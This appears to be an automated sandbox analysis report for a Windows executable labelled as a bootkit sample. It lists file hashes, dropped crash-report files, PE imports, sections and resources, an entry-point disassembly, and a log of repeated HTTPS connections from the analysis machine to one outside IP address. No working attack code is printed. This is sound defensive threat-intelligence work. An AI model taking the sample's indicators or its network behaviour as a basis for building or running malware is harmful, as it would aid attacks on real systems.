C:\ProgramData\Microsoft\Windows\WER\Temp\WER99A5.tmp.dmp

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Mini DuMP crash report, 15 streams, Tue Jul 2 19:24:34 2024, 0x1205a4 type
Category:	dropped
Size (bytes):	101814
Entropy (8bit):	2.210521829400285
Encrypted:	false
SSDEEP:	384:M1E/5LOCDB36LnLls70jCNl/5w3MpQDeDXzEGy+T/i5jAoguJ82beFAo+cA3:M1g9OCDB36TLls7eCD0M9a+Teea3
MD5:	5B08E9B06B00AE1D8365398FF38095CF
SHA1:	41C516B0C192EAA0D6EDA594804201C0B316E8E6
SHA-256:	1CEAFC0965188E6792B73A73548385B16600898CA4502C79BE4651B5F4AAE63B
SHA-512:	A4F85F9F2C08EFDCECD638257DFE28481C89BC00EB5853FBCD1FDE3367E4F1E9533589D4E459BD4526619D0FB0D85A154E823B8F6156A9BBECD565B3CE35435D
Malicious:	false
Reputation:	low
Preview:	MDMP..a..... ........S.f......................................... ......T....L..........`.......8...........T...........x=..>P..........("...........$..............................................................................eJ.......$......GenuineIntel............T............S.f.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WER9AEE.tmp.WERInternalMetadata.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	8548
Entropy (8bit):	3.700676266382517
Encrypted:	false
SSDEEP:	192:R6l7wVeJ0u6Uegf6Y9sSUdad1gmfha6YpDy89bqIsfyOm:R6lXJl6t46YmSUdavgmfha6eq7fC
MD5:	05A4B228ADA850759511309CFEAD5496
SHA1:	9D9BAD1D445F79692E38E7663CB1C02FECA5615F
SHA-256:	46F79F2C17F1D4CEB8D90D718BFD12EFAE4899EB9C7D0D07B31562982489ADBF
SHA-512:	18D5A4959FB56F287CF5BD54A19AC5E985AB74EE6F489FBBE7CA435533692ABFD12EC59C93152FA746E4346C314B0E769F90E6BA1A5C7E4765340AAAB9040876
Malicious:	false
Reputation:	low
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.7.3.4.4.<./.P.i.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER9BBA.tmp.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4831
Entropy (8bit):	4.5747268452462775
Encrypted:	false
SSDEEP:	48:cvIwWl8zs9Jg77aI9/kWpW8VYHYm8M4JeSEF0+q8uWKgYH68A2Wd:uIjfXI7V97VTJllgYH6YWd
MD5:	47927441EEBEE2487193011159190172
SHA1:	A817266585770D3B0C2D8C921E67B111F07F69B6
SHA-256:	E84C5C25D6DE969648E9E29C9774B8AA51074297BC1732B1D3C9C046D8CEA0D9
SHA-512:	F10CC2A3976928E67D3532FE9FCA9764949B295D47AF71957BE11E524E9BA53D28A4149AA02DAED32937A0B07DCE28833E32D159DACE38830F0C39D64FE597E6
Malicious:	false
Reputation:	low
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="393747" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

C:\Windows\appcompat\Programs\Amcache.hve

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	MS Windows registry file, NT/2000 or above
Category:	dropped
Size (bytes):	1835008
Entropy (8bit):	4.465671636634917
Encrypted:	false
SSDEEP:	6144:tIXfpi67eLPU9skLmb0b4+WSPKaJG8nAgejZMMhA2gX4WABl0uNzdwBCswSbD:+XD94+WlLZMM6YFHF+D
MD5:	40B76D48265384B5669DB6802446CE61
SHA1:	B3E57C72ADD415F3CF7FA75EB8AB4A9299423FD1
SHA-256:	7CB4ABBBC08C8539E7C4A8E358750848108BBD9CF0639CC7C7A85970B5E25778
SHA-512:	A3DF4952696AFD9D3AE95AAC28DD4B97D942F62AA7EAF3813D250087A5DB878690E7254FC94B7931641221E51225A1119D778EB17EA465B774D0B1F2B76840E5
Malicious:	false
Reputation:	low
Preview:	regf6...6....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm..cx.................................................................................................................................................................................................................................................................................................................................................BuL........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.280357872770324
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	SecuriteInfo.com.Win32.BootkitX-gen.5272.14841.exe
File size:	297'984 bytes
MD5:	1ee22348c50e6aa7c055ae0e006a96ab
SHA1:	cd567a91bff85257a82d6c397502e5556779075b
SHA256:	ff4c03965c0c4c428eaa7ddbb442ae1537e78efb0d9ec07a10f793b7d6153a58
SHA512:	6f4ea159b003349cae50cd6f6d7eff6e21cb329e486db448a845cac89472e84c51fb6b5fa61b23c14de8ba3e8b95561a7045538ffa8f46deb14000322fb015a0
SSDEEP:	6144:H9L7UWpKojODqWEbt89gPTAUWuwyIcJnT3tsZAn5Aaq3RxR11WQd8x:dPUD+bFWqt3tts3pWNx
TLSH:	A954AE512AF69526FFF79B341A3496941A3BBC737E70808D3690B24E4E33691DE60723
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......._...................................{...<...........v...........................Rich............PE..L...7.2d.................H.

File Icon


Icon Hash:	cb97374d5551599a

Static PE Info

General

Entrypoint:	0x4019e1
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	NX_COMPAT, TERMINAL_SERVER_AWARE
Time Stamp:	0x6432A837 [Sun Apr 9 11:57:43 2023 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	0
File Version Major:	5
File Version Minor:	0
Subsystem Version Major:	5
Subsystem Version Minor:	0
Import Hash:	04c19b0a4924298ad5f0ee3be3224e92

Entrypoint Preview

Instruction
call 00007F6698F9FEFFh
jmp 00007F6698F9C3FEh
mov edi, edi
push ebp
mov ebp, esp
sub esp, 00000328h
mov dword ptr [0043A8F8h], eax
mov dword ptr [0043A8F4h], ecx
mov dword ptr [0043A8F0h], edx
mov dword ptr [0043A8ECh], ebx
mov dword ptr [0043A8E8h], esi
mov dword ptr [0043A8E4h], edi
mov word ptr [0043A910h], ss
mov word ptr [0043A904h], cs
mov word ptr [0043A8E0h], ds
mov word ptr [0043A8DCh], es
mov word ptr [0043A8D8h], fs
mov word ptr [0043A8D4h], gs
pushfd
pop dword ptr [0043A908h]
mov eax, dword ptr [ebp+00h]
mov dword ptr [0043A8FCh], eax
mov eax, dword ptr [ebp+04h]
mov dword ptr [0043A900h], eax
lea eax, dword ptr [ebp+08h]
mov dword ptr [0043A90Ch], eax
mov eax, dword ptr [ebp-00000320h]
mov dword ptr [0043A848h], 00010001h
mov eax, dword ptr [0043A900h]
mov dword ptr [0043A7FCh], eax
mov dword ptr [0043A7F0h], C0000409h
mov dword ptr [0043A7F4h], 00000001h
mov eax, dword ptr [00439004h]
mov dword ptr [ebp-00000328h], eax
mov eax, dword ptr [00439008h]
mov dword ptr [ebp-00000324h], eax
call dword ptr [000000A8h]

Rich Headers

Programming Language:

[C++] VS2008 build 21022
[ASM] VS2008 build 21022
[ C ] VS2008 build 21022
[IMP] VS2005 build 50727
[RES] VS2008 build 21022
[LNK] VS2008 build 21022

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x3777c	0x78	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x2326000	0xff08	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x36000	0x188	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x34609	0x34800	bf1a49a6af27a192a7c164ec29fc14e8	False	0.9142810639880953	data	7.858975641411642	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x36000	0x205c	0x2200	77fafdd3854df85c129724c9d76e5747	False	0.34719669117647056	data	5.402931699789178	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x39000	0x22ec520	0x1e00	55db1340cb01a502bb80d349a80b9d40	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x2326000	0xff08	0x10000	425c30f2b9bc4a26de83e156a02c34c5	False	0.459320068359375	data	4.991657229883422	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
YEFE	0x232cf08	0x3fa	ASCII text, with very long lines (1018), with no line terminators	Turkish	Turkey	0.6316306483300589
RT_CURSOR	0x232d308	0x130	Device independent bitmap graphic, 32 x 64 x 1, image size 0			0.7368421052631579
RT_CURSOR	0x232d438	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 0			0.06130705394190871
RT_ICON	0x23266d0	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colors	Turkish	Turkey	0.6079424307036247
RT_ICON	0x2327578	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colors	Turkish	Turkey	0.6935920577617328
RT_ICON	0x2327e20	0x6c8	Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colors	Turkish	Turkey	0.7505760368663594
RT_ICON	0x23284e8	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colors	Turkish	Turkey	0.7976878612716763
RT_ICON	0x2328a50	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 9216	Turkish	Turkey	0.5983402489626556
RT_ICON	0x232aff8	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 4096	Turkish	Turkey	0.726782363977486
RT_ICON	0x232c0a0	0x988	Device independent bitmap graphic, 24 x 48 x 32, image size 2304	Turkish	Turkey	0.739344262295082
RT_ICON	0x232ca28	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 1024	Turkish	Turkey	0.8847517730496454
RT_STRING	0x232fbb8	0x18e	data			0.4798994974874372
RT_STRING	0x232fd48	0x9e	data			0.569620253164557
RT_STRING	0x232fde8	0x6c8	data			0.4245391705069124
RT_STRING	0x23304b0	0x67a	data			0.43184559710494574
RT_STRING	0x2330b30	0x5e0	data			0.4375
RT_STRING	0x2331110	0x258	data			0.4866666666666667
RT_STRING	0x2331368	0x6f8	data			0.4304932735426009
RT_STRING	0x2331a60	0x62e	data			0.4393173198482933
RT_STRING	0x2332090	0x6fa	data			0.425531914893617
RT_STRING	0x2332790	0x5a0	data			0.4388888888888889
RT_STRING	0x2332d30	0x67c	AmigaOS bitmap font "a", fc_YSize 28416, 18944 elements, 2nd "&", 3rd "a"			0.4295180722891566
RT_STRING	0x23333b0	0x868	data			0.4144981412639405
RT_STRING	0x2333c18	0x87c	data			0.4129834254143646
RT_STRING	0x2334498	0x624	data			0.4357506361323155
RT_STRING	0x2334ac0	0x68a	data			0.43309438470728795
RT_STRING	0x2335150	0x68e	data			0.43206197854588796
RT_STRING	0x23357e0	0x646	data			0.4364881693648817
RT_STRING	0x2335e28	0xdc	data			0.5590909090909091
RT_GROUP_CURSOR	0x232f9e0	0x22	data			1.088235294117647
RT_GROUP_ICON	0x232ce90	0x76	data	Turkish	Turkey	0.6610169491525424
RT_VERSION	0x232fa08	0x1b0	data			0.5972222222222222

Imports

DLL	Import
KERNEL32.dll	SetVolumeMountPointW, GetComputerNameW, SleepEx, GetCommProperties, GetModuleHandleW, GetTickCount, ReadConsoleOutputA, GlobalAlloc, lstrcpynW, WriteConsoleW, GetModuleFileNameW, GetConsoleAliasesW, CreateJobObjectW, GetProcAddress, BuildCommDCBW, GetAtomNameA, LoadLibraryA, UnhandledExceptionFilter, InterlockedExchangeAdd, AddAtomA, FoldStringA, lstrcatW, EnumDateFormatsW, FindFirstVolumeA, AreFileApisANSI, OpenJobObjectA, ZombifyActCtx, GetLastError, GetConsoleAliasExesLengthA, CreateFileA, GetConsoleOutputCP, MultiByteToWideChar, HeapAlloc, HeapReAlloc, GetStartupInfoW, TerminateProcess, GetCurrentProcess, SetUnhandledExceptionFilter, IsDebuggerPresent, GetCPInfo, InterlockedIncrement, InterlockedDecrement, GetACP, GetOEMCP, IsValidCodePage, TlsGetValue, TlsAlloc, TlsSetValue, TlsFree, SetLastError, GetCurrentThreadId, DeleteCriticalSection, LeaveCriticalSection, EnterCriticalSection, HeapFree, VirtualFree, VirtualAlloc, HeapCreate, Sleep, ExitProcess, WriteFile, GetStdHandle, GetModuleFileNameA, SetHandleCount, GetFileType, GetStartupInfoA, HeapSize, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetCommandLineW, QueryPerformanceCounter, GetCurrentProcessId, GetSystemTimeAsFileTime, LCMapStringA, WideCharToMultiByte, LCMapStringW, GetStringTypeA, GetStringTypeW, GetLocaleInfoA, InitializeCriticalSectionAndSpinCount, RtlUnwind, ReadFile, GetConsoleCP, GetConsoleMode, FlushFileBuffers, SetFilePointer, SetStdHandle, CloseHandle, WriteConsoleA
GDI32.dll	GetBoundsRect
ADVAPI32.dll	EnumDependentServicesA
ole32.dll	CoTaskMemRealloc
WINHTTP.dll	WinHttpAddRequestHeaders

Possible Origin

Language of compilation system	Country where language is spoken	Map
Turkish	Turkey

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jul 2, 2024 21:24:23.023765087 CEST	49730	443	192.168.2.4	188.114.96.3
Jul 2, 2024 21:24:23.023819923 CEST	443	49730	188.114.96.3	192.168.2.4
Jul 2, 2024 21:24:23.023911953 CEST	49730	443	192.168.2.4	188.114.96.3
Jul 2, 2024 21:24:23.027290106 CEST	49730	443	192.168.2.4	188.114.96.3
Jul 2, 2024 21:24:23.027303934 CEST	443	49730	188.114.96.3	192.168.2.4
Jul 2, 2024 21:24:23.513782024 CEST	443	49730	188.114.96.3	192.168.2.4
Jul 2, 2024 21:24:23.513854027 CEST	49730	443	192.168.2.4	188.114.96.3
Jul 2, 2024 21:24:23.517956018 CEST	49730	443	192.168.2.4	188.114.96.3
Jul 2, 2024 21:24:23.517970085 CEST	443	49730	188.114.96.3	192.168.2.4
Jul 2, 2024 21:24:23.518203020 CEST	443	49730	188.114.96.3	192.168.2.4
Jul 2, 2024 21:24:23.594199896 CEST	49730	443	192.168.2.4	188.114.96.3
Jul 2, 2024 21:24:23.594224930 CEST	49730	443	192.168.2.4	188.114.96.3
Jul 2, 2024 21:24:23.594362974 CEST	443	49730	188.114.96.3	192.168.2.4
Jul 2, 2024 21:24:23.972543001 CEST	443	49730	188.114.96.3	192.168.2.4
Jul 2, 2024 21:24:23.972913027 CEST	443	49730	188.114.96.3	192.168.2.4
Jul 2, 2024 21:24:23.972980976 CEST	49730	443	192.168.2.4	188.114.96.3
Jul 2, 2024 21:24:23.974582911 CEST	49730	443	192.168.2.4	188.114.96.3
Jul 2, 2024 21:24:23.974601984 CEST	443	49730	188.114.96.3	192.168.2.4
Jul 2, 2024 21:24:23.978451967 CEST	49731	443	192.168.2.4	188.114.96.3
Jul 2, 2024 21:24:23.978502989 CEST	443	49731	188.114.96.3	192.168.2.4
Jul 2, 2024 21:24:23.978574038 CEST	49731	443	192.168.2.4	188.114.96.3
Jul 2, 2024 21:24:23.978842974 CEST	49731	443	192.168.2.4	188.114.96.3
Jul 2, 2024 21:24:23.978857040 CEST	443	49731	188.114.96.3	192.168.2.4
Jul 2, 2024 21:24:24.445550919 CEST	443	49731	188.114.96.3	192.168.2.4
Jul 2, 2024 21:24:24.445656061 CEST	49731	443	192.168.2.4	188.114.96.3
Jul 2, 2024 21:24:24.448486090 CEST	49731	443	192.168.2.4	188.114.96.3
Jul 2, 2024 21:24:24.448498011 CEST	443	49731	188.114.96.3	192.168.2.4
Jul 2, 2024 21:24:24.448770046 CEST	443	49731	188.114.96.3	192.168.2.4
Jul 2, 2024 21:24:24.449924946 CEST	49731	443	192.168.2.4	188.114.96.3
Jul 2, 2024 21:24:24.449951887 CEST	49731	443	192.168.2.4	188.114.96.3
Jul 2, 2024 21:24:24.449985981 CEST	443	49731	188.114.96.3	192.168.2.4
Jul 2, 2024 21:24:24.882308960 CEST	443	49731	188.114.96.3	192.168.2.4
Jul 2, 2024 21:24:24.882559061 CEST	443	49731	188.114.96.3	192.168.2.4
Jul 2, 2024 21:24:24.882590055 CEST	443	49731	188.114.96.3	192.168.2.4
Jul 2, 2024 21:24:24.882621050 CEST	443	49731	188.114.96.3	192.168.2.4
Jul 2, 2024 21:24:24.882641077 CEST	49731	443	192.168.2.4	188.114.96.3
Jul 2, 2024 21:24:24.882647991 CEST	443	49731	188.114.96.3	192.168.2.4
Jul 2, 2024 21:24:24.882663965 CEST	443	49731	188.114.96.3	192.168.2.4
Jul 2, 2024 21:24:24.882666111 CEST	49731	443	192.168.2.4	188.114.96.3
Jul 2, 2024 21:24:24.882699966 CEST	49731	443	192.168.2.4	188.114.96.3
Jul 2, 2024 21:24:24.882711887 CEST	443	49731	188.114.96.3	192.168.2.4
Jul 2, 2024 21:24:24.883090019 CEST	443	49731	188.114.96.3	192.168.2.4
Jul 2, 2024 21:24:24.883111000 CEST	443	49731	188.114.96.3	192.168.2.4
Jul 2, 2024 21:24:24.883136034 CEST	49731	443	192.168.2.4	188.114.96.3
Jul 2, 2024 21:24:24.883142948 CEST	443	49731	188.114.96.3	192.168.2.4
Jul 2, 2024 21:24:24.883192062 CEST	49731	443	192.168.2.4	188.114.96.3
Jul 2, 2024 21:24:24.887248039 CEST	443	49731	188.114.96.3	192.168.2.4
Jul 2, 2024 21:24:24.887305021 CEST	443	49731	188.114.96.3	192.168.2.4
Jul 2, 2024 21:24:24.887346029 CEST	49731	443	192.168.2.4	188.114.96.3
Jul 2, 2024 21:24:24.887351990 CEST	443	49731	188.114.96.3	192.168.2.4
Jul 2, 2024 21:24:24.935097933 CEST	49731	443	192.168.2.4	188.114.96.3
Jul 2, 2024 21:24:24.971050978 CEST	443	49731	188.114.96.3	192.168.2.4
Jul 2, 2024 21:24:24.971286058 CEST	443	49731	188.114.96.3	192.168.2.4
Jul 2, 2024 21:24:24.971326113 CEST	49731	443	192.168.2.4	188.114.96.3
Jul 2, 2024 21:24:24.971333981 CEST	443	49731	188.114.96.3	192.168.2.4
Jul 2, 2024 21:24:24.972157955 CEST	443	49731	188.114.96.3	192.168.2.4
Jul 2, 2024 21:24:24.972209930 CEST	49731	443	192.168.2.4	188.114.96.3
Jul 2, 2024 21:24:24.972282887 CEST	49731	443	192.168.2.4	188.114.96.3
Jul 2, 2024 21:24:24.972296000 CEST	443	49731	188.114.96.3	192.168.2.4
Jul 2, 2024 21:24:24.972306013 CEST	49731	443	192.168.2.4	188.114.96.3
Jul 2, 2024 21:24:24.972311020 CEST	443	49731	188.114.96.3	192.168.2.4
Jul 2, 2024 21:24:25.211344957 CEST	49732	443	192.168.2.4	188.114.96.3
Jul 2, 2024 21:24:25.211394072 CEST	443	49732	188.114.96.3	192.168.2.4
Jul 2, 2024 21:24:25.211466074 CEST	49732	443	192.168.2.4	188.114.96.3
Jul 2, 2024 21:24:25.211801052 CEST	49732	443	192.168.2.4	188.114.96.3
Jul 2, 2024 21:24:25.211815119 CEST	443	49732	188.114.96.3	192.168.2.4
Jul 2, 2024 21:24:25.708220959 CEST	443	49732	188.114.96.3	192.168.2.4
Jul 2, 2024 21:24:25.708293915 CEST	49732	443	192.168.2.4	188.114.96.3
Jul 2, 2024 21:24:25.709726095 CEST	49732	443	192.168.2.4	188.114.96.3
Jul 2, 2024 21:24:25.709739923 CEST	443	49732	188.114.96.3	192.168.2.4
Jul 2, 2024 21:24:25.709948063 CEST	443	49732	188.114.96.3	192.168.2.4
Jul 2, 2024 21:24:25.711143970 CEST	49732	443	192.168.2.4	188.114.96.3
Jul 2, 2024 21:24:25.711268902 CEST	49732	443	192.168.2.4	188.114.96.3
Jul 2, 2024 21:24:25.711302996 CEST	443	49732	188.114.96.3	192.168.2.4
Jul 2, 2024 21:24:25.711352110 CEST	49732	443	192.168.2.4	188.114.96.3
Jul 2, 2024 21:24:25.711361885 CEST	443	49732	188.114.96.3	192.168.2.4
Jul 2, 2024 21:24:26.210639954 CEST	443	49732	188.114.96.3	192.168.2.4
Jul 2, 2024 21:24:26.210727930 CEST	443	49732	188.114.96.3	192.168.2.4
Jul 2, 2024 21:24:26.210798025 CEST	49732	443	192.168.2.4	188.114.96.3
Jul 2, 2024 21:24:26.210890055 CEST	49732	443	192.168.2.4	188.114.96.3
Jul 2, 2024 21:24:26.210911989 CEST	443	49732	188.114.96.3	192.168.2.4
Jul 2, 2024 21:24:26.520224094 CEST	49733	443	192.168.2.4	188.114.96.3
Jul 2, 2024 21:24:26.520263910 CEST	443	49733	188.114.96.3	192.168.2.4
Jul 2, 2024 21:24:26.520348072 CEST	49733	443	192.168.2.4	188.114.96.3
Jul 2, 2024 21:24:26.520672083 CEST	49733	443	192.168.2.4	188.114.96.3
Jul 2, 2024 21:24:26.520684958 CEST	443	49733	188.114.96.3	192.168.2.4
Jul 2, 2024 21:24:27.011389017 CEST	443	49733	188.114.96.3	192.168.2.4
Jul 2, 2024 21:24:27.011615038 CEST	49733	443	192.168.2.4	188.114.96.3
Jul 2, 2024 21:24:27.013014078 CEST	49733	443	192.168.2.4	188.114.96.3
Jul 2, 2024 21:24:27.013024092 CEST	443	49733	188.114.96.3	192.168.2.4
Jul 2, 2024 21:24:27.013283968 CEST	443	49733	188.114.96.3	192.168.2.4
Jul 2, 2024 21:24:27.014592886 CEST	49733	443	192.168.2.4	188.114.96.3
Jul 2, 2024 21:24:27.014724016 CEST	49733	443	192.168.2.4	188.114.96.3
Jul 2, 2024 21:24:27.014754057 CEST	443	49733	188.114.96.3	192.168.2.4
Jul 2, 2024 21:24:27.478611946 CEST	443	49733	188.114.96.3	192.168.2.4
Jul 2, 2024 21:24:27.478710890 CEST	443	49733	188.114.96.3	192.168.2.4
Jul 2, 2024 21:24:27.478876114 CEST	49733	443	192.168.2.4	188.114.96.3
Jul 2, 2024 21:24:27.478990078 CEST	49733	443	192.168.2.4	188.114.96.3
Jul 2, 2024 21:24:27.479010105 CEST	443	49733	188.114.96.3	192.168.2.4
Jul 2, 2024 21:24:27.682143927 CEST	49734	443	192.168.2.4	188.114.96.3
Jul 2, 2024 21:24:27.682169914 CEST	443	49734	188.114.96.3	192.168.2.4
Jul 2, 2024 21:24:27.682280064 CEST	49734	443	192.168.2.4	188.114.96.3
Jul 2, 2024 21:24:27.682624102 CEST	49734	443	192.168.2.4	188.114.96.3
Jul 2, 2024 21:24:27.682636976 CEST	443	49734	188.114.96.3	192.168.2.4
Jul 2, 2024 21:24:28.149173021 CEST	443	49734	188.114.96.3	192.168.2.4
Jul 2, 2024 21:24:28.149281979 CEST	49734	443	192.168.2.4	188.114.96.3
Jul 2, 2024 21:24:28.150774956 CEST	49734	443	192.168.2.4	188.114.96.3
Jul 2, 2024 21:24:28.150787115 CEST	443	49734	188.114.96.3	192.168.2.4
Jul 2, 2024 21:24:28.150989056 CEST	443	49734	188.114.96.3	192.168.2.4
Jul 2, 2024 21:24:28.152297020 CEST	49734	443	192.168.2.4	188.114.96.3
Jul 2, 2024 21:24:28.152442932 CEST	49734	443	192.168.2.4	188.114.96.3
Jul 2, 2024 21:24:28.152472019 CEST	443	49734	188.114.96.3	192.168.2.4
Jul 2, 2024 21:24:28.152539968 CEST	49734	443	192.168.2.4	188.114.96.3
Jul 2, 2024 21:24:28.152549028 CEST	443	49734	188.114.96.3	192.168.2.4
Jul 2, 2024 21:24:28.693641901 CEST	443	49734	188.114.96.3	192.168.2.4
Jul 2, 2024 21:24:28.693739891 CEST	443	49734	188.114.96.3	192.168.2.4
Jul 2, 2024 21:24:28.693854094 CEST	49734	443	192.168.2.4	188.114.96.3
Jul 2, 2024 21:24:28.694219112 CEST	49734	443	192.168.2.4	188.114.96.3
Jul 2, 2024 21:24:28.694237947 CEST	443	49734	188.114.96.3	192.168.2.4
Jul 2, 2024 21:24:29.073592901 CEST	49735	443	192.168.2.4	188.114.96.3
Jul 2, 2024 21:24:29.073637962 CEST	443	49735	188.114.96.3	192.168.2.4
Jul 2, 2024 21:24:29.073726892 CEST	49735	443	192.168.2.4	188.114.96.3
Jul 2, 2024 21:24:29.074009895 CEST	49735	443	192.168.2.4	188.114.96.3
Jul 2, 2024 21:24:29.074022055 CEST	443	49735	188.114.96.3	192.168.2.4
Jul 2, 2024 21:24:29.542105913 CEST	443	49735	188.114.96.3	192.168.2.4
Jul 2, 2024 21:24:29.542226076 CEST	49735	443	192.168.2.4	188.114.96.3
Jul 2, 2024 21:24:29.547982931 CEST	49735	443	192.168.2.4	188.114.96.3
Jul 2, 2024 21:24:29.547991037 CEST	443	49735	188.114.96.3	192.168.2.4
Jul 2, 2024 21:24:29.548196077 CEST	443	49735	188.114.96.3	192.168.2.4
Jul 2, 2024 21:24:29.549640894 CEST	49735	443	192.168.2.4	188.114.96.3
Jul 2, 2024 21:24:29.549774885 CEST	49735	443	192.168.2.4	188.114.96.3
Jul 2, 2024 21:24:29.549807072 CEST	443	49735	188.114.96.3	192.168.2.4
Jul 2, 2024 21:24:29.949402094 CEST	443	49735	188.114.96.3	192.168.2.4
Jul 2, 2024 21:24:29.949501038 CEST	443	49735	188.114.96.3	192.168.2.4
Jul 2, 2024 21:24:29.949549913 CEST	49735	443	192.168.2.4	188.114.96.3
Jul 2, 2024 21:24:29.949707031 CEST	49735	443	192.168.2.4	188.114.96.3
